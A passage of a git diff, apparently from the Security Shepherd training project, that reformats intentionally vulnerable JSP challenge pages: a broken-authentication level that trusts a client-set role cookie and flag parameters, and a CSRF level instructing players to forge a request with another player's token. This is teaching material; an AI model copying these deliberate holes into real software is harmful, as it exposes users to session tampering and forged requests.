-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter = 0;
+			$("#leForm").submit(function(){
+				counter = counter + 1;
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					document.cookie="challengeRole=LmH6nmbC";
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							returnUserRole: "false",
+							returnPassword: "false",
+							adminDetected: "false"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+			$("#aUserName").change(function () {
+				$("#userContent").text($(this).val());
+			}).change();
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+			
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1.jsp b/src/main/webapp/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1.jsp
index b046bc229..c2272894f 100644
--- a/src/main/webapp/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1.jsp
+++ b/src/main/webapp/challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1.jsp
@@ -1,236 +1,245 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    // Broken Authentication and Session Management Challenge Five
+// Broken Authentication and Session Management Challenge Five
 
 /**
  * <br/><br/>
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
  *
  * @author Mark Denihan
  */
 
-    String levelName = "Broken Auth and Session Management Challenge Five";
-    String levelHash = "7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1";
+String levelName = "Broken Auth and Session Management Challenge Five";
+String levelHash = "7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
+String i18nLevelName = bundle.getString("challenge.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/>
-    <form id="leForm" action="javascript:;">
-        <div id="resultsDiv">
-            <table>
-                <tr>
-                    <td><%= bundle.getString("challenge.form.userName") %>
-                    </td>
-                    <td><input type="text" id="subUserName"/></td>
-                </tr>
-                <tr>
-                    <td><%= bundle.getString("challenge.form.password") %>
-                    </td>
-                    <td><input type="password" id="subUserPassword"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2">
-                        <div id="submitButton">
-                            <input type="submit"
-                                   value="<%= bundle.getString("challenge.form.signIn") %>"/>
-                        </div>
-                    </td>
-                </tr>
-            </table>
-        </div>
-        <input type="button" id="showUserControl"
-               value="<%= bundle.getString("challenge.form.forgotPassword") %>"/>
-    </form>
-    <p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %>
-    </p>
-    <br/>
-    <div id="userControl" style="display: none;">
-        <form id="leForm2" action="javascript:;">
-            <h2 class='title'><%= bundle.getString("change.header") %>
-            </h2>
-            <p>
-                <%= bundle.getString("change.whatToDo") %>
-            </p>
-            <table>
-                <tr>
-                    <td><%= bundle.getString("challenge.form.userName") %>
-                    </td>
-                    <td><input type="text" id="userToReset"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2">
-                        <div id="resetSubmit">
-                            <input type="submit"
-                                   value="<%= bundle.getString("change.form.sendEmail") %>"/>
-                        </div>
-                        <p style="display: none;"
-                           id="resetLoadingSign"><%= bundle.getString("challenge.form.loading") %>
-                        </p>
-                    </td>
-                </tr>
-            </table>
-        </form>
-        <div id="resultsDiv2"></div>
-    </div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        var theSubName = $("#subUserName").val();
-        var theSubPassword = $("#subUserPassword").val();
-        $("#loadingSign").show("slow");
-        $("#forgottenPassDiv").hide("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    subUserName: theSubName,
-                    subUserPassword: theSubPassword
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#loadingSign").hide("fast", function () {
-                $("#resultsDiv").show("slow");
-            });
-        });
-    });
-
-    //<%= bundle.getString("clue.1") %>
-    $("#leForm2").submit(function () {
-        var theUserToReset = $("#userToReset").val();
-        $("#resetSubmit").hide("fast");
-        $("#resetLoadingSign").show("slow");
-        $("#resultsDiv2").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>SendToken",
-                data: {
-                    subUserName: theUserToReset
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv2").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv2").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv2").show("slow", function () {
-                $("#resetLoadingSign").hide("fast", function () {
-                    $("#resetSubmit").show("slow");
-                });
-            });
-        });
-    });
-
-    $("#showUserControl").click(function () {
-        $("#userControl").toggle("slow", function () {
-            //Animation Complete
-            ;
-        });
-    });
-
-    //<%= bundle.getString("clue.2") %>
-    //<%= bundle.getString("clue.3") %>
-    $("#leForm3").submit(function () {
-        var theUserName = $("#subUserName").val();
-        var theNewPassword = $("#subNewPass").val();
-        var theToken = $("#updatePasswordToken").val();
-        $("#resetSubmit").hide("fast");
-        $("#resetLoadingSign").show("slow");
-        $("#resultsDiv2").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>ChangePass",
-                data: {
-                    userName: theUserName,
-                    newPassword: theNewPassword,
-                    resetPasswordToken: theToken
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv2").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv2").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv2").show("slow", function () {
-                $("#resetLoadingSign").hide("fast", function () {
-                    $("#resetSubmit").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br />
+		<form id="leForm" action="javascript:;">
+			<div id="resultsDiv">
+				<table>
+					<tr>
+						<td><%= bundle.getString("challenge.form.userName") %></td>
+						<td><input type="text" id="subUserName" /></td>
+					</tr>
+					<tr>
+						<td><%= bundle.getString("challenge.form.password") %></td>
+						<td><input type="password" id="subUserPassword" /></td>
+					</tr>
+					<tr>
+						<td colspan="2">
+							<div id="submitButton">
+								<input type="submit"
+									value="<%= bundle.getString("challenge.form.signIn") %>" />
+							</div>
+						</td>
+					</tr>
+				</table>
+			</div>
+			<input type="button" id="showUserControl"
+				value="<%= bundle.getString("challenge.form.forgotPassword") %>" />
+		</form>
+		<p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+		<br />
+		<div id="userControl" style="display: none;">
+			<form id="leForm2" action="javascript:;">
+				<h2 class='title'><%= bundle.getString("change.header") %></h2>
+				<p>
+					<%= bundle.getString("change.whatToDo") %>
+				</p>
+				<table>
+					<tr>
+						<td><%= bundle.getString("challenge.form.userName") %></td>
+						<td><input type="text" id="userToReset" /></td>
+					</tr>
+					<tr>
+						<td colspan="2">
+							<div id="resetSubmit">
+								<input type="submit"
+									value="<%= bundle.getString("change.form.sendEmail") %>" />
+							</div>
+							<p style="display: none;" id="resetLoadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+						</td>
+					</tr>
+				</table>
+			</form>
+			<div id="resultsDiv2"></div>
+		</div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				var theSubName = $("#subUserName").val();
+				var theSubPassword = $("#subUserPassword").val();
+				$("#loadingSign").show("slow");
+				$("#forgottenPassDiv").hide("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							subUserName: theSubName,
+							subUserPassword: theSubPassword
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#loadingSign").hide("fast", function(){
+						$("#resultsDiv").show("slow");
+					});
+				});
+			});
+			
+			//<%= bundle.getString("clue.1") %>
+			$("#leForm2").submit(function(){
+				var theUserToReset = $("#userToReset").val();
+				$("#resetSubmit").hide("fast");
+				$("#resetLoadingSign").show("slow");
+				$("#resultsDiv2").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>SendToken",
+						data: {
+							subUserName: theUserToReset
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv2").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv2").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv2").show("slow", function(){
+						$("#resetLoadingSign").hide("fast", function(){
+							$("#resetSubmit").show("slow");
+						});
+					});
+				});
+			});
+			
+			$("#showUserControl").click(function(){
+				$("#userControl").toggle("slow", function(){
+					//Animation Complete
+					;
+				});
+			});
+			
+			//<%= bundle.getString("clue.2") %>
+			//<%= bundle.getString("clue.3") %>
+			$("#leForm3").submit(function(){
+				var theUserName = $("#subUserName").val();
+				var theNewPassword = $("#subNewPass").val();
+				var theToken = $("#updatePasswordToken").val();
+				$("#resetSubmit").hide("fast");
+				$("#resetLoadingSign").show("slow");
+				$("#resultsDiv2").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>ChangePass",
+						data: {
+							userName: theUserName,
+							newPassword: theNewPassword,
+							resetPasswordToken: theToken
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv2").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv2").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv2").show("slow", function(){
+						$("#resetLoadingSign").hide("fast", function(){
+							$("#resetSubmit").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3.jsp b/src/main/webapp/challenges/7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3.jsp
index 8c106f0a3..152d78eb8 100644
--- a/src/main/webapp/challenges/7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3.jsp
+++ b/src/main/webapp/challenges/7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3.jsp
@@ -1,199 +1,203 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    // Cross Site Request Forgery Challenge 7
+	// Cross Site Request Forgery Challenge 7
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-    String levelName = "CSRF Challenge 7";
-    String levelHash = "7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3";
+String levelName = "CSRF Challenge 7";
+String levelHash = "7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
-    String i18nLevelName = bundle.getString("title.csrf7");
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
+String i18nLevelName = bundle.getString("title.csrf7");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String ApplicationRoot = getServletContext().getRealPath("");
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String userClass = null;
-            if (ses.getAttribute("userClass") != null) {
-                userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
-            }
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-
-            //Set CSRF Challenge 7 CsrfToken
-            String csrfChal7Token = Hash.randomString().trim();
-            ses.setAttribute("csrfChallengeSevenNonce", csrfChal7Token);
-            Setter.setCsrfChallengeSevenCsrfToken(userId, csrfChal7Token, ApplicationRoot);
-            String getYourTokenUrl = Encode.forHtmlAttribute("../user/csrfchallengeseven/getToken?userId=" + userId);
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String ApplicationRoot = getServletContext().getRealPath("");
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
+		String userClass = null;
+		if(ses.getAttribute("userClass") != null)
+		{
+			userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
+		}
+		String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+		
+		//Set CSRF Challenge 7 CsrfToken
+		String csrfChal7Token = Hash.randomString().trim();
+		ses.setAttribute("csrfChallengeSevenNonce", csrfChal7Token);
+		Setter.setCsrfChallengeSevenCsrfToken(userId, csrfChal7Token, ApplicationRoot);
+		String getYourTokenUrl = Encode.forHtmlAttribute("../user/csrfchallengeseven/getToken?userId=" + userId);
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+      <p>
         To complete the challenge you need;
-    <ul>
-        <li>Your ID: <a><%= userId %>
-        </a></li>
-        <li>Another player's CSRF token</li>
-        <li>A CSRF form attacking <a>POST /user/csrfchallengeseven/plusplus</a></li>
-    </ul>
-    </p>
-    <p>
-        Once the victim visits your site hosting the CSRF exploit it will increment your CSRF counter above 0.
-    </p>
-    <p>
+        <ul>
+          <li>Your ID: <a><%= userId %></a></li>
+          <li>Another player's CSRF token</li>
+          <li>A CSRF form attacking <a>POST /user/csrfchallengeseven/plusplus</a></li>
+        </ul>
+      </p>
+			<p>
+			  Once the victim visits your site hosting the CSRF exploit it will increment your CSRF counter above 0.
+      </p>
+      <p>
         So the form should send a POST request to
         <a>POST /user/csrfchallengeseven/plusplus</a> which is vulnerable to CSRF
-        <br/> With the following parameters;
-    <ul>
-        <li><a>userId = <%= userId %>
-        </a></li>
-        <li><a>csrfToken = csrfTokenOfAnotherPlayer</a></li>
-    </ul>
-    </p>
-    <p>
+        <br /> With the following parameters;
+        <ul>
+          <li><a>userId = <%= userId %></a></li>
+          <li><a>csrfToken = csrfTokenOfAnotherPlayer</a></li>
+        </ul>
+      </p>
+      <p>
         You've been reading that right. Along with your own ID you'll need the CSRF token of another player.
-        <br/> Once you have successfully CSRF'd another Security Shepherd user, the solution key will appear below this
-        write up.
-        <br/> You can get your token using this function: <a href="<%= getYourTokenUrl %>">getYourToken</a>.
-    </p>
-
-    <br/> <br/>
-    <%= bundle.getString("challenge.useForumForIframe") %>
-    <%
-        String moduleId = Getter.getModuleIdFromHash(ApplicationRoot, levelHash);
-        if (Getter.isCsrfLevelComplete(ApplicationRoot, moduleId, userId)) { %>
-
-    <h2 class='title'><%= bundle.getString("result.challengeCompleted") %>
-    </h2>
-    <p>
-            <%= bundle.getString("result.congratsTheKeyIs") %>
-        <b>
-            <a><%=    Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String) ses.getAttribute("userName")) %>
-            </a></b><br/>
-        <br/>
-            <% } %>
+        <br /> Once you have successfully CSRF'd another Security Shepherd user, the solution key will appear below this write up.
+        <br /> You can get your token using this function: <a href="<%= getYourTokenUrl %>">getYourToken</a>.
+      </p>
 
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("forum.iframe.whatToDo") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="myMessageAris"
-                           type="text"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("forum.postMessage") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+			<br /> <br />
+			<%= bundle.getString("challenge.useForumForIframe") %>
+			<% 
+				String moduleId = Getter.getModuleIdFromHash(ApplicationRoot, levelHash);	
+				if (Getter.isCsrfLevelComplete(ApplicationRoot, moduleId, userId)) 
+				{ %>
+		
+		<h2 class='title'><%= bundle.getString("result.challengeCompleted") %></h2>
+		<p>
+			<%= bundle.getString("result.congratsTheKeyIs") %>
+			<b> <a><%=	Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String)ses.getAttribute("userName")) %></a></b><br />
+			<br />
+			<% } %>
+		
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("forum.iframe.whatToDo") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="myMessageAris"
+						type="text" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("forum.postMessage") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv">
-        <%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
-    </div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theMessage = $("#myMessageAris").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    myMessage: theMessage,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv">
+			<%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
+		</div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theMessage = $("#myMessageAris").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							myMessage: theMessage,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
